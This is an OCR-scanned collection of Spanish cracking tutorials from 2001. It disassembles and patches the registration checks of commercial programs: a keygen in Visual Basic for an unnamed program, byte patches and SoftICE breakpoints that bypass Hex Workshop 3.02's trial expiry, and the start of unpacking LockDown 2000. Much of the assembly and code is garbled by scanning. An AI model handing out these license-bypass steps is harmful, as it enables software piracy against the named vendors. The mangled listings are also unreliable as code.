:0040591D 8B1510F04200 mov edx, dword ptr [0042F010] Un valor 10 como constante 


:00405923 8995DOFEFFEF mov dword ptr [ebp+-FFFFFEDO], edx 
:00405929 83BDCCFEFFFFO1  cmp dword ptr [ebp+FFFFFECC], 00000001 
:00405930 7C09 31 0040593B 


1:00405932 83BDDOFEFFFF01 — cmp dword ptr [ebp+FFEFFEDO], 00000001 
1:00405939 7D19 jge 00405954 Vamos a 00405954 


1:00405954 8B4508 mov eax, dword ptr [ebp+08]  EAX = Nuestro nombre 
1:00405957 8B00 mov eax, dword ptr [eax] 

1:00405959 40 inc eax 

1:0040595A 50 push eax 

1:0040595B 8D85F4FEFFFF lea eax, dword ptr [ebpp+FFFFFEF4] 

1:00405961 50 push eax 

1:00405962 E8B9270000 call 00408120 Crea una lista de caracteres con el nombre 
1100405967 59 popecx Recibe nuestro nombre 

1:00405968 59 pop ecx 

1:00403969 8B85CCFEFFEF mov eax, dword ptr [ebp+FFFFFECC] 

:0040596F 3B85DOFEFFEF cmp eax, dword ptr [ebp+FFFFFEDO] 

1100405975 7D09 Jge 00405980 

1100405977 8B95SCCFEFFFF mov edx, dword ptr [ebp+FFFFFECC] 

1:0040597D EBO07 jmp 00405986 

1:0040597F 90 nop 

1:00405980 8B95DOFEFFFF mov edx, dword ptr [ebp+-FFFFFEDO] 

1:00405986 8995D4FEFFEF mov dword ptr [ebp+FFFFFEDA4], edx 

1:0040598C C785D8FEFFFFO0000000 mov dword ptr [ebp+FFFFFED8], 00000000 
1100405996 EB23 j¡mp004059BB  PoneEAX a0 y crea una lista por medio de una palabra clave, la cual 
¡servirá adelante, sale y va a 00405A3F 


[ep] código que continuaba fué omitido adrede para no mostrar la palabra secreta que es la base para la generación del serial 
correcto, el siguiente código es la continuación después de salir de la rutina de la palabra secreta*** 
¡EjO Esta es la rutina de generación del serial correcto 


:004059E0 8B9DCCFEFFFF mov ebx, dword ptr [ebpp+FFFFFECC] — Longitud del nombre 

1:004059E6 2B9DDOFEFFEF sub ebx, dword ptr [ebpp+FFFFFEDO]  EBX=Constante 10 - Longitud del nombre 
1:004059EC 8B85EOFEFFFF mov eax, dword ptr [ebp+FFFFFEE0]  EAX =0 en cada vuelta sumara 1 a EAX 
1:004059F2 OFB69405F4FEFFFF — movzx edx, byte ptr [ebp+eax-0000010C] Ir aqui para ver Nota 1 
:004059FA 0395E0FEFFFF add edx, dword ptr [ebp+FFFFFEE0O]  Sumara el valor de EAX 

1:00405A00 01D3 add ebx,edx  EBX=EBX+EDX 

1:00405A02 899DE4FEFFFF mov dword ptr [ebp+FFFFFEE4], ebx Mueve el resultado, servirá adelante 
1:00405A08 8$B8DE4FEFFFF mov ecx, dword ptr [ebpp+FFFFFEE4] 

1:00405A0E D1E1 shlecx, 1  ECX=ECX*2 

1:00405A 10 8B95E4FEFFEF mov edx, dword ptr [ebpp+FFFFFEE4] Recupera el valor de EBX anterior 
:00405A16 DIEA shredx,1 Divide el valor entre 2 y saca el entero 

1:00405A18 01D1 add ecx, edx  ECX=ECX+EDX 

1:00405A1A 038DD4FEFFFF add ecx, dword ptr [ebp+FFFFFED4] Suma a ECX la longitud del nombre 
1:00405A20 898DESFEFFFF mov dword ptr [ebp+FFFFFEES8], ecx 

1100405426 8B95E4FEFFFF mov edx, dword ptr [ebp+FFFFFEE4] Recupera el valor de EBX 
:00405A2C OFAF9SESFEFFFF imul edx, dword ptr [ebp+FFFFFEE8]  EDX=EDX*ECX 

1:00405A33 0195DCFEFFFF add dword ptr [ebp+FFFFFEDC], edx  Acumula el valor de EDX 
1:00405A39 FF8SS5EOFEFFFF inc dword ptr [ebp+FFFFFEE0] Incrementa uno a EAX 

1:00405A3F 8B85E0OFEFFFF mov eax, dword ptr [ebp+FFEFFFEEO] 

:00405A45 3B85CCFEFFFF cmp eax, dword ptr [ebp+FFFFFECC] 

1:00405A4B 7C93 j1004059E0 Compara si valor es menor no salta 

1:00405A4D 8B85DCFEFFFF mov eax, dword ptr [ebp+FFFFFEDC]  EAX recibe el acumulado total 
1:00405A53 31D2 xor edx, edx EDX=0 

1:00405A55 F7BSDOFEFFFF div dword ptr [ebp+FFFFFEDO] Ver Nota 2 aqui 

1:00405A5B 89D2 mov edx, edx 

1:00405A5D 8995ECFEFFFF mov dword ptr [ebp+FFFFFEEC], edx Ver Nota 3 aqui 
1:00405A63 8$BB5ECFEFFFF mov esi, dword ptr [ebp+FFFFFEEC] 
1:00405A69 46 inc esi 
1:00405A6A 8B 1D0CF04200 mov ebx, dword ptr [0042F00C] 
1:00405A70 8A 1433 mov dl, byte ptr [ebx+esi] 
1:00405A73 8895FOFEFFFF mov byte ptr [ebp+FFFFFEFO], dl 
1100405479 FFB5SDCFEFFFF push dword ptr [ebpp+FFFFFEDC] 
1:00405A7F OFBES5FOFEFFFF movsx eax, byte ptr [ebp+FFFFFEFO] 


1:00405A86 50 push eax 


:00405A87 68EA524100 push 004152EA 


:00405A8C 8D85F4FEFFEF lea eax, dword ptr [ebp+-FFFFFEF4] 

:00405A92 50 push eax 

:00405A93 E868490000 call 00404400 

:00405A98 83C410 add esp, 00000010 Aqui si solicitamos D ESP ya podemos ver nuestro serial 


E coloisie vaz AN 
Nombre | ByTESCRK 
Serial | B528375 


¿o Generar  : 


Nota 1: Extrae caracteres de acuerdo a la longitud del nombre, primero el 1, luego el 2, etc. aqui se utiliza la palabra secreta, el valor 
devuelto es decimal y es la suma de cada caracter en orden desde el primer caracter de cada palabra (la secreta y nuestro nombre) 


Nota 2: Extrae el caracter en la última posición de EAX, lo devuelve a EDX 


Nota 3: Extrae el caracter de la posición devuelta a EDX de la palabra secreta 


Modulo de generación del serial programado en Visual Basic 
Private Sub Command1_Click() 

minombre = Trim(Text1.Text) 

miserial = 0 

clave = "COLOQUE AQUI LA PALABRA CLAVE" 

largo = Len(minombre) 
If largo < 10 Then 

falta = 10 - largo 


Else 
faltan = largo - 10 
End If 
If largo > 10 Then 
largol = 10 
Else 
largol = largo 
End If 


For i= 1 To largol 
characl = Asc(Mid(minombre, i, 1)) 
charac2 = Asc(Mid(clave, i, 1)) 
Charac3 = characl + charac2 
minombrel = minombrel + Chr(Charac3) 
Next 
If Len(minombre) > 10 Then 
minombre = minombrel + Mid(minombre, 11, (Len(minombre) - 10)) 
Else 
minombre = minombrel 
End If 
For i=1 To Len(Trim(minombre)) 
edx = Asc(Mid(minombere, i, 1)) 
edx =edx + (1 - 1) 
ebx = edx - falta 
ecx = ebx * 2 
edx = Int(ebx / 2) 
ecx = ecx + edx 
ecx = ecx + largo 
edx =ebx * ecx 
miserial = miserial + edx 
Next 


LETRA = Mid(Trim(Str(miserial)), Len(Trim(Str(miserial))), 1) + 1 

LETRA = Mid(clave, LETRA, 1) 

Text2.Text = LETRA + Trim(Str(miserial)) 
End Sub 
Eso es todo, ahora ya hemos generado nuestro propio serial o nuestro keygen, antes que nada no está demás decirles que 
"Si les gusta el programa paguen por él'' 


No me responsabilizo por el mal uso de este tutorial, el fin principal es "Aprender Más". 


Ahora quiero saludar a nuestro buen amigo Karpoff que es quien nos apoya en este arte de enseñar, así tambien a CaoS_ReptantE 
puesto que sin su ayuda desinteresada este tutorial no hubiese sido posible, gracias tambien a Act_MagoO por algunas cosillas. 


ByTESCRK 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: | HexWorkShop v3.02 


PROTECCION: Aplicacion con limite de tiempo 
Descripcion: Editor Hexadecimal 
Dificultad: Novato 

DOWNLOAD : http://bpsotkE.com 


Softice v4.0, W32dasm v8.93, Hex Workshop v 


Herramientas: Herramientas: 20 
Fantomas: 
CRACKER : FECHA: 07/07/2001 


INTRODUCCION 


En esta ocacion voy a analizar la version v3.02, no puedo hablar sobre las 
ventajas o desventajas de esta aplicacion, ya que al momento de hacer uso de esta, 
ya estaba vencido el periodo de evaluacion, y bueno, algo habia que hacer 


Un tanto ingenuo, volvi a instalar la aplicacion, para ver si en algo cambiaban las 
cosas, por aquello de que pudiese ser un error de instalacion o registro, y nada asi 
que 


AL ATAKE 


Veamos primero que pasa, despues de correr la aplicacion, tenemos enfrente algo 
asi: 


Upgrade Notice 


cerramos la aplicacion y ahora nos aparece esto: 


Product Expiration 


noten que marca una fecha de expiracion el 8 de Agosto y apenas estamos en 
Julio, pero eso no importa 


Nuevamente corremos la aplicacion, y ahora tenemos presente el siguiente 
mensage 


Product Expiration 


valla que son especiales estas gentes de BreackPoint Software Inc. ya que 
insisto que tienen una mania por las cajas de texto o cajas de dialogo, bueno 
sigamos adelante, seleccionemos el boton Unlock y entraremos a la seccion de 
registro 


Hex Workshop Software Registration 


O5O86 2577 | 


sin embargo estos datos no son validos y el resultado es 


Ahora carguemos la aplicacion con el w32dasm y busquemos la cadena de texto 
Invalid Key oO la cadena de texto Please check your key and try again y 
para nuestra sorpresa, no vamos a enconrtrar ninguna, es mas si buscas las 
cadenas de texto de la caja de dialogo anterior Registration Information, 
Name, Company O Cancel no vamos a encontrar nada, entonces que pasa. 


La respuesta la vamos a encontrar en el archivo bpsregwd.d11, 
carguemoslo con el w32dasm y busquemos la cadena de texto Invalid Key 


:10002E35 EB4E 3mp 10002E85 


* Referenced by a Conditional Jump at Address :10002E09 

* Possible Reference to String Resource ID=00014: "Please check 
your key and try again. If this problem persis" 

:10002E37 6A0E push 0000000E 

:10002E39 8D4DEC lea ecx, dword ptr [ebp-14] 

:10002E3C E822C70000 call 1000F563 


* Possible Reference to String Resource ID=00012: "Invalid Key" 


:10002E41 
:10002E43 
:10002E46 
:10002E4B 
:10002E4D 
:10002E4F 
:10002E52 


G6A0C push 0000000C 

8D4DF0O lea ecx, dword ptr [ebp-10] 
E818C70000 call 1000F563 

6AZ40 push 00000040 

8BCE mov ecx, esil 

FF75FO push [ebp-10] 

FF75EC push [ebp-14] 


vamonos entonces a ver quien llamo a esta rutina ( vamos a la direccion :10002E09) 


:10002DFF 
:10002E04 
:10002E07 
:10002E09 


E83BF4FFFF call 1000223F 
83C418 add esp, 00000018 
85C0 test eax, eax 

752C€ jne 10002E37 


* Possible Reference to String Resource ID=00013: "Thank you! 
Your product has been unlocked." 


:10002E0B 6A0D push 0000000D 
:10002E0D 8D4DEC lea ecx, dword ptr [ebp-14] 


:10002E10 


E84EC70000 call 1000F563 


llegando aqui, es claro lo que vamos a hacer, sustituimos 


:10002E07 


o bien 


852C TEST EAX, EAX por :10002E07 33C0 XOR EAX, EAX 


:10002E09 752€ JNE 10002E37 por :10002E09 752C JE 10002E37 


corremos la aplicacion, en la ventana Product Expiration le damos a Unlock 
en la siguiente caja llenamos los campos Name, Company y Key y le damos OK y 


obtendremos esto 


sencillo no creen? y si creen que ya logramos 'crecer' la aplicacion. pues con 
mucha pena les digo que todo este teatro es una rutina 'caza-tontos', ya que una 
vez que le das a Aceptar se cierra la aplicacion y todo vuelve a empezar 


Por lo tanto, empezamos a sospechar que esta aplicacion esta confeccionada de 
una forma diferente a las versiones anteriores, justo cuando me empezaba a 
aburrir esto de la Informatica Inversa, encuentro algo interesante, vamos a 
analizar mas a fondo la aplicacion. 


Vamos observar que la rutina 


:10002D73 FF766C push [esi+6C] 

:10002D76 8D850CFFFFFF lea eax, dword ptr [ebp+FEFFFFFOC] 
:10002D7C 50 push eax 
:10002D7D E85E0A0000 call 100037E0 

:10002D82 FF7664 push [esi+64] 

:10002D85 8D855CFFFFFF lea eax, dword ptr [ebp+FEFFFFF5C] 
:10002D8B 50 push eax 
:10002D8C E84F0A0000 call 100037E0 

:10002D91 FF7668 push [esi+68] 

:10002D94 8D45CC lea eax, dword ptr [ebp-34] 
:10002D97 50 push eax 

:10002D98 E8430A0000 call 100037E0 

:10002D9D FF7670 push [esi+70] 

:10002DA0 8D45AC lea eax, dword ptr [ebp-54] 
:10002DA3 50 push eax 

:10002DA4 E8370A0000 call 100037E0 


copia desde la localidad de memoria ++0167:00C94250 hasta la localidad memoria 
+015F:0064EBAO, todos los datos que pusimos 


Mas adelante nos volvemos a encontrar en la direccion :10002DFF con siguiente instruccion 


:10002DFF E83BF4FFFF call 1000223F 


y justo aqui, nos meternos a la rutina :1000223F para ver que sucede ahi dentro 


* Referenced by a CALL at Addresses :10002DFF 
:1000223F 55 push ebp 

:10002240 8BEC mov ebp, esp 

:10002242 81ECC8010000 sub esp, 000001C8 
:10002248 53 push ebx 


:10002272 
:10002273 
:10002276 
:10002277 
:1000227A 


50 push eax 


8D45EC lea eax, dword ptr [ebp-14] 
50 push eax 
FF751C push [ebp+1C] 


E896FCFFFF call 10001F15 


podemos observar que no sucede nada imoportante hasta llegar a la direccion :1000227A, 
vallamos ahora dentro de la rutina :10001F15 

| 

:10001F15 55 push ebp 

:10001F16 8BEC mov ebp, esp 

:10001F18 81EC54010000 sub esp, 00000154 

:10001F1E 53 push ebx 

:10001F1F 56 push esi 

:10001F20 8065FF00 and byte ptr [ebp-01], 00 

:10001F24 57 push edi 

:10001F25 6880000000 push 00000080 

:10001F2A 8D85ACFEFFFF lea eax, dword ptr [ebp+FFFFFEAC] 
:10001F30 FF7508 push [ebp+08] 

:10001F33 50 push eax 

:10001F34 E8E7240000 call 10004420 

:10001F39 8D852CFFFFFF lea eax, dword ptr [ebp+FEFFFFF2C] 
:10001F3F 50 push eax 

:10001F40 8D856CFFFFFF lea eax, dword ptr [ebp+FFFFFFE6C] 
:10001F46 50 push eax 

:10001F47 8D45AC lea eax, dword ptr [ebp-54] 

:10001F4A 50 push eax 

:10001F4B 8D85ACFEFFFF lea eax, dword ptr [ebp+FFFFFEAC] 
:10001F51 50 push eax 

:10001F52 E838FFFFFF call 10001E8F 


lo mas importante hasta aqui es la rutina ca11 10004420, ya que copia la serie de numeros 
que pusimos como KE Y 

desde la localidad de memoria 0064EC60 hasta 0064E.828 para empezar a checarla, para 
ello saltemos ahora hasta la rutina : 10001E8F 


* Referenced by a CALL at Address 


:10001F52 


:10001E£8F 
:10001E90 
:10001E92 
:10001E93 


55 push ebp 
8BEC mov ebp, 
53 push ebx 
56 push esi 


esp 


* Possible StringData Ref from Data 0b3 ->"-" 


BEA4810110 mov esi, 100181A4 


33DB xor ebx, ebx 

56 push esi 

FF7508 push [ebp+08] 
E8A4220000 call 10004148 
59 pop ecx 

3BC3 cmp eax, ebx 

59 pop ecx 

7465 je 10001F0F 

50 push eax 

FF750C push [ebp+0C] 
E82D190000 call 100037E0 
56 push esi 

53 push ebx 

E88E220000 call 10004148 
83C410 add esp, 00000010 
3BC3 cmp eax, ebx 

744E Je 10001F0F 

50 push eax 

FF7510 push [ebp+10] 
EÉE816190000 call 100037E0 
56 push esi 

53 push ebx 

E877220000 call 10004148 
83C410 add esp, 00000010 
3BC3 cmp eax, ebx 

7437 je 10001F0F 

50 push eax 

FF7514 push [ebp+14] 
E8FF180000 call 100037E0 


lo primero que les voy a mencionar es que en la direccion :10001F0F se encuentra la salida con 
error, asi que evitaremos caer ahi, y la salida con exito en :10001F0D asi que habra que saltar 
todos los obstaculos hasta llegar aqui. 


Cada vez que entra a la rutina :10004148, detecta donde estan los 'guiones' (-) 0x2Dh y los 
sustituye por 0x00h 


y cada vez que entra a la rutina :100037E0, copia cada seccion de la KEY en otras areas de la 
memoria ( :0064E928, :0064E908 y :0064E8E8 ), es claro que nosotros solo pusimos 
dos secciones, asi que la rutina nos sacara en la direccion :10001£ED6 7437 je 10001FOF 


en caso de haber puesto tres secciones, habriamos avanzado, para entonces toparnos con otro 
filtro 


:10001EE1 FF7514 push [ebp+14] 
:10001EE4 E8E7190000 call 100038D0 


:10001EE9 
:10001EEC 
:10001EEF 
:10001EF1 
:10001EF4 
:10001EF9 
:10001EFC 
:10001EFD 
:10001EFF 
:10001F02 
:10001F07 
:10001F0A 
:10001F0B 
:10001F0D 


* Referenced by a Conditional Jump at Addresses: 
:10001EBF, 


:10001F0F 
:10001F11 
:10001F12 
:10001F13 
:10001F14 


observen que la longitud de cada seccion es otro factor a considerar( 5 , 
caracteres ), asi que cambiamos de inmediato nuestro KEY por este otro 12345-678909- 


83C40C add esp, 0000000C 
83F804 cmp eax, 00000004 
751E jne 10001F0F 

FF7510 push [ebp+10] 
E8D7190000 call 100038DO 
83F806 cmp eax, 00000006 
59 pop ecx 

7510 jne 10001F0F 

FF750C push [ebp+0C] 
EÉ8c9190000 call 100038DO 
83F805 cmp eax, 00000005 
59 pop ecx 

7202 Jb 10001F0F 

B301 mov bl, 01 


:10001ED6, :10001EEF, 
8g8AC3 mov al, 
5E pop esi 
5B pop ebx 
5D pop ebp 
C3 ret 


bl 


:10001EFD, 


:10001EA8, 
:10001F0B 


6 y 4 


8765, esperamos que como minimo lleguemos a la direccion :10001F0D 


con exito 


Arrancamos de nuevo y regresamos de la rutina ca11 10001E8F con la bandera a 1, o sea 
con el valor del acumulador igual a uno, a partir de este momento ( se supone que estamos en la 
direccion :10001F'57 ), la salida por error es : 100020B6 asi que evitaremos caer aqui, nos 
vamos hasta la direccion 


E838FFFFFF call 10001E8F 
83C41C add esp, 0000001C 
84C0 test al, al 
0F8454010000 je 
8D45AC lea eax, 
50 push eax 
E865190000 call 
83F805 cmp eax, 
59 pop ecx 
or8gc41010000 31 100020B6 

8D7405A8 lea esi, dword ptr [ebp+eax-58] 
8D45EC lea eax, dword ptr [ebp-14] 

56 push esi 

50 push eax 


100020B6 
dword ptr [ebp-54] 
100038D0 
00000005 


E85D180000 call 100037E0 


802600 and byte ptr [esil], 00 
807DAC2A cmp byte ptr [ebp-54], 2A 
59 pop ecx 

59 pop ecx 


7508 jne 10001F96 


donde, una vez efectuado el salto, empieza el verdadero analisis de nuestra KEY que de hecho 


es un tanto complicada, y aunque paresca mucho 'rollo', la voy a poner completa, ya que para 
eso estamos aqui, para aprender a analizar 


:10001F96 
:10001F99 
:10001F9B 
:10001F9C 
:10001F9F 
:10001FA0 


8D45F8 lea eax, dword ptr [ebp-08] 
G6A0A push 0000000A 

50 push eax 

8D45AC lea eax, dword ptr [ebp-54] 


50 push eax 
E847220000 call 100041EC 


veamos, la rutina : 100041EC analiza el primer digito ( nuestro caso es 12345-678909- 
8765 ), el resultado obtenido lo guarda en la localidad de memoria 0064EB5C= 00000001 


:10001FA5 
:10001FA8 
:10001FAB 
:10001FAD 
:10001FBO 
:10001FB4 
:10001FB7 
:10001FBA 
:10001FBD 
:10001FCO 
:10001FC2 
:10001FC3 
:10001FC6 
:10001FC7 


8B4D10 mov ecx, dword ptr 
83C40C add esp, 0000000C 
8901 mov dword ptr [ecx], eax 
8A45EC mov al, byte ptr [ebp-14] 
80650A00 and byte ptr [ebp+0A], 
884508 mov byte ptr [ebp+08], al 
8A45ED mov al, byte ptr [ebp-13] 
884509 mov byte ptr [ebp+09], al 
8D45F8 lea eax, dword ptr [ebp-08] 
6A10 push 00000010 

50 push eax 
8D4508 lea eax, 
50 push eax 
E83C240000 call 10004408 


[ebp+10] 


00 


dword ptr [ebp+08] 


la rutina :10004408 analiza el segundo y tercer digito ( nuestro caso es 12345-678909- 
8765 ), el resultado obtenido lo guarda en la localidad de memoria 0064EB73= 00000023 


:10001FCC 
:10001FCF 
:10001FD2 
:10001FD4 
:10001EFD7 
:10001FDA 
:10001FE0O 
:10001FE3 
:10001FE7 


8B4D14 mov ecx, dword ptr 
83C40C add esp, 0000000C 
8801 mov byte ptr lecx], 
8B45F8 mov eax, dword ptr 
803800 cmp byte ptr leax], 
0F85D6000000 jne 100020B6 
8A45bEE mov al, byte ptr [ebp-12] 
8065F600 and byte ptr [ebp-0A], 
8845F4 mov byte ptr [ebp-0C], al 


[ebp+14] 
al 


[ebp-08] 
00 


00 


:10001FEA 
:10001FED 
:10001FF0 
:10001FF'3 


8A45EF mov al, byte ptr [ebp-11] 
8845F5 mov byte ptr [ebp-0B], al 
8D45F8 lea eax, dword ptr [ebp-08] 
6A10 push 00000010 


:10001FF5 
:10001FF6 
:10001FF9 
:10001FFA 


50 push eax 


50 push eax 


8D45F4 lea eax, 


dword ptr 


[ebp-0C] 


E809240000 call 10004408 


la rutina :10004408 analiza el cuarto y quinto digito ( nuestro caso es 12345-678909- 


8765 ), el resultado obtenido lo guarda en 


la localidad de memoria 0064EB68 
nuestro par ) 

la localidad de memoria 0064EB66 
la localidad de memoria 0064EB72 
la localidad de memoria 0064EB67 


00000005 (esto es igual al segundo digito de 


00000001 (si el primer digito de nuestro par es 2 ) 
00000001 (si el primer digito de nuestro par es 4 ) 
00000001 (si el primer digito de nuestro par es 8 ) 


:10001FFF 8B4DF8 mov ecx, dword ptr [ebp-08] 
:10002002 83C40C add esp, 0000000C 

:10002005 803900 cmp byte ptr [ecx]l, 00 
:10002008 0F85A8000000 jne 100020B6 
:1000200E 8B7518 mov esi, dword ptr [ebp+18] 
:10002011 8AC8 mov cl, al 

:10002013 83E11F and ecx, 0000001F 

:10002016 8B7D1C mov edi, dword ptr [ebp+1C] 
:10002019 890E mov dword ptr [esil, ecx 
:1000201B 8AC8 mov cl, al 

:1000201D 80E120 and cl, 20 

:10002020 8B5D20 mov ebx, dword ptr [ebp+20] 
:10002023 80F920 cmp cl, 20 

:10002026 6A0A push 0000000A 

:10002028 0F94C1 sete cl 

:1000202B 880F mov byte ptr [edil], cl 
:1000202D 8AC8 mov cl, al 

:1000202F 80E140 and cl, 40 

:10002032 80F940 cmp cl, 40 

:10002035 0F94C1 sete cl 

:10002038 2480 and al, 80 

:1000203A 880B mov byte ptr l[ebx], cl 
:1000203C€ 8B4D24 mov ecx, dword ptr [ebp+24] 
:1000203F 3C80 cmp al, 80 

:10002041 0F94C0 sete al 

:10002044 8801 mov byte ptr lecx], al 
:10002046 8D45F8 lea eax, dword ptr [ebp-08] 
:10002049 50 push eax 

:1000204A 8D856CFFFFFF lea eax, dword ptr [ebp+FEFFFFFE6C] 
:10002050 50 push eax 

:10002051 E896210000 call 100041EC 


la rutina :100041EC analiza la segunda seccion ( nuestro caso es 12345-678909-8765 ), 
el resultado obtenido lo guarda en la localidad de memoria 0064EBFC 


0DOOA5BEFD este 


numero es el exadecimal del numero decimal 678909 


:10002056 8B4D0C mov ecx, dword ptr [ebp+0C] 
:10002059 83C40C add esp, 0000000C 

:1000205C€ 8901 mov dword ptr [ecx], eax 
:1000205E 8B45F8 mov eax, dword ptr [ebp-08] 
:10002061 803800 cmp byte ptr [eax]l, 00 
:10002064 7550 jne 100020B6 

:10002066 8D45F8 lea eax, dword ptr [ebp-08] 
:10002069 6A10 push 00000010 

:1000206B 50 push eax 

:1000206C€ 8D852CFFFFFF lea eax, dword ptr [ebp+FEFEFFFF2C] 
:10002072 50 push eax 

:10002073 E890230000 call 10004408 


la rutina :100041EC analiza la tercer seccion ( nuestro caso es 12345-678909-8765 ), el 
resultado obtenido lo guarda en la localidad de memoria 0064EA30 00008765 


:10002078 
:1000207B 


894518 
8B45F8 


mov dword ptr [ebp+18], eax 
mov eax, dword ptr [ebp-08] 


:1000207E 
:10002081 
:10002084 


83C40C add esp, 


0000000€ 


803800 cmp byte ptr leax], 
7530 jne 100020B6 


00 


hasta aqui, la entrega se ha hecho sin error, ahora hay que ver que condiciones deben cumplir 
cada resultado obtenido, eso se desarrolla en la rutina siguiente 


:10002086 
:10002089 
:1000208B 
:1000208C 
:1000208E 
:1000208EF 
:10002091 
:10002092 
:10002095 
:10002097 
:10002099 
:1000209A 
:1000209D 
:1000209F 
:100020A2 
:100020A4 
:100020A9 
:100020AC 
:100020AF 


8B4524 mov eax, dword ptr 
8A00 mov al, byte ptr 
50 push eax 
8A03 mov al, 
50 push eax 
g8A07 mov al, 
50 push eax 
8B4514 mov eax, dword ptr 
FF36 push dword ptr [esi] 
8A00 mov al, byte ptr 
50 push eax 
8B4510 mov eax, 
FF30 push dword 
8B450C mov eax, 
FF30 push dword ptr [eax] 
E884FDFFFF call 10001E2D 
OFB7CO movzx eax, ax 
83C41C add esp, 0000001C 
394518 cmp dword ptr [ebp+ 


byte ptr 


byte ptr 


dword ptr 
ptr [eax] 
dword ptr 


[eax] 


[ebx] 


[edi] 


[eax] 


[ebp+24] 


[ebp+14] 


[ebp+10] 


[ebp+0C] 


18], eax 


:100020B2 0F9445FF sete byte ptr [ebp-01] 
:100020B6 8A45FF mov al, byte ptr [ebp-01] 
:100020B9 5F pop edi 

:100020BA 5E pop esi 

:100020BB 5B pop ebx 

:100020BC C9 leave 

:100020BD C3 ret 


En la rutina : 10001E2D se juega un poco con los siguientes datos mediante 'algoritmos' un 


tanto inutiles 


0167:0064E7D4 FD 5B 0A 00 02 A42 F5 FF-01 00 00 00 FE FF FF FF 
0167:0064E7E4 23 00 00 00 05 00 00 00-00 00 00 00 01 00 00 00 
0167:0064E7F4 00 00 00 00 7C E9 64 00-A9 20 00 10 FD 5B 0A 00 
0167:0064E804 01 00 00 00 00 EB 64 00-05 00 00 00 00 EB 64 00 


para asi poder obtener un numero 'magico' el cual es comparado con la tercer seccion de 
nuestra KE Y, de esta forma vamos a obtener el numero de serie correcto, en mi caso tendria que 
cambiar 8765 por A207, para que la aplicacion no rechace el KEY, si pones un BPX en 
100020AF y checas el numero en [ebp+18] , veras la tercer seccion de tu KEY, y en el 
acumulador puedes obtener la tercer seccion correcta. 


Hasta aqui ya podemos asegurar el triunfo, salvo un pequeño detalle que mencionare mas 
adelante, asi que vamos a concluir: la aplicacion sera registrada en dos pasos: 


PRIMER PASO - Cambios en codigo muerto 


Vamos a tener que efectuar ciertos cambios en el codigo de la aplicacion ( en realidad, los 
cambios deben ser efectuados en la libreria de la aplicacion besregwd.d11 ), en algunos 


lugares estrategicos mediante algun editor hexagesimal 


El primer cambio sera efectuado aqui 


:1000228A 8B4D0C mov ecx, dword ptr [ebp+0C] 
:1000228D 384DFF cmp byte ptr [ebp-01], cl 
:10002290 0F857F010000 jne 10002415 


| 
cambiarlo por 


:1000228A 8B4DFF mov ecx, dword ptr [ebp-01] 
:1000228D 384DFF cmp byte ptr [ebp-01], cl 
:10002290 0F857F010000 3jne 10002415 


no hay necesidad de explicarlo. 


Este es el siguiente cambio 


:100022B8 84C0 test al, al 
:100022BA 7515 jne 100022D1 


| 
cambiarlo por 


:100022B8 3AC0 cmp al, al 
:100022BA 7515 jne 100022D1 


este cambio tampoco hay porque explicarlo, a primera vista se ve porque hay que realizarlo. 


El ultimo cambio en el codigo es el siguiente 


:10002330 7470 Je 100023A2 


| 
habra que cambiarlo por 


:10002330 EB70 jmp 100023A2 


| 
tambien es logico el porque 


Como pueden observar los cambio efectuados son para impedir que la aplicacion 
nos saque del camino correcto y termine con un letrerito 'Error en la Key...' o con 
este otro 'La aplicacion ha sido desbloqueada...' y al fin de cuentas no nos registre 


SEGUNDO PASO - Cambios en caliente 


Vamos a tener que correr la aplicacion con el Softlce y hacer dos interrupciones en algunos 
lugares estrategicos, el primero ya lo mencionamos y sera para conocer la tercer seccion de 
nuestra KEY 


Coloca un BPX en 100020AF y checas el numero en EAX, dejas correr la aplicacion hasta que 
termine, corriges tu KEY y corres nuevamente la aplicacion, pero ahora con una interrupcion 
BPX 10001C75, aqui vamos a observar la localidad de memoria [EBP+0C] y le 
vamos a cambiar su valor a uno ( 0x01h ) 


:10001C75 55 push ebp 
:10001C76 8BEC mov ebp, esp 
:10001C78 53 push ebx 
:10001C79 FF7514 push [ebp+14] 
:10001C7C FF7510 push [ebp+10] 
:10001C7F FF750C push [ebp+0C] 
:10001C82 FF7508 push [ebp+08] 
:10001C85 E81B000000 call 10001CA5 
:10001C8A FF7514 push [ebp+14] 
:10001C8D 8AD8 mov bl, al 
:10001C8F FF7510 push [ebp+10] 


de esta forma todo marchara bien y podremos asegurar que le quitamos los BUGS 
a esta aplicacion 
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CRACKER: FECHA: 05/07/2001 
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Herramientas: 


INTRODUCCION 


Este analisis esta basado en el tutorial que presento Gohan para el LockDown v7.0, tal 
vez no haya mucho que aprender, pero para aquellos como yo, que no tengan la version 
7.0 y si a 5.0, y quieran practicar (que es la base del aprendisaje), he aqui otra version, 
que a pesar de ser ligeramente diferente a la v7.0 el mecanismo utilizado por Gohan es 
aplicable 


Gracias Gohan. 


AL ATAKE 


Ante la imposibilidad de cargar la aplicacion con W432dasm98, supondremos que posiblemente se 
encuentre empacada y antes de empezar a destripar la aplicacion, vamos a analizarla con el 
GetTyp 2.60 y Obtenemos lo siguiente 


= --- $ GetTyp 2.60 + $ Copyright (c) 1997-99 by PHaX $ --- 
= === $ phaxQwriteme.com + + http://surf.to/phax + --- 
$ free edition $ --- 


- [LockDown2000.exe] ----- 
DOS executable file -— 622592 bytes 


Portable executable (starting at 256 for 622336 bytes) 
Packer: PKLite32 1.1 

Calculated entrypoint: 80384 / 00013A00h (RVA: 001E4000h) 
Required CPU type: 80386 

Requires any version of Win32 

File is executable 

Line numbers stripped from file 

Local symbols stripped from file 

32 bit word machine 

Linker version: 2.25 

Objects (object align = 00001000h): 


etc, etc, etc. 


Ahora utilizaremos ProcDump32 para poder desempacarlo y una vez hecho esto, ahora si vamonos con el 
W32dasm98 


Lo primero que haremos, sera quitar esa rutina de retardo que se aplica al inicio, asi que buscaremos alguna cadena 
de texto que contenga la palabra Sleep y encontramos varios e inclusive encontramos un SleepEx, esto va a 


dificultar un poco la tarea 


Vamos entonces con el Softice y ponemos dos interrupciones bpex Sleep ybpx SleepEx, de esta 
forma cazaremos la primer rutina de retardo con Sleep, y lo que estabamos esperando aparece en la direccion 
:004C73F6 veamos 


:004C73E3 8BF0O mov esi, eax 
:004C73E5 EB14 jmp 004C73FB 


* Referenced by a Conditional Jump at Address :004C7402 
| 

:004C73E7 6A00 push 00000000 

:004C73E9 E826DFFEFF call 004B5314 

:004C73EE 8BF0O mov esi, eax 

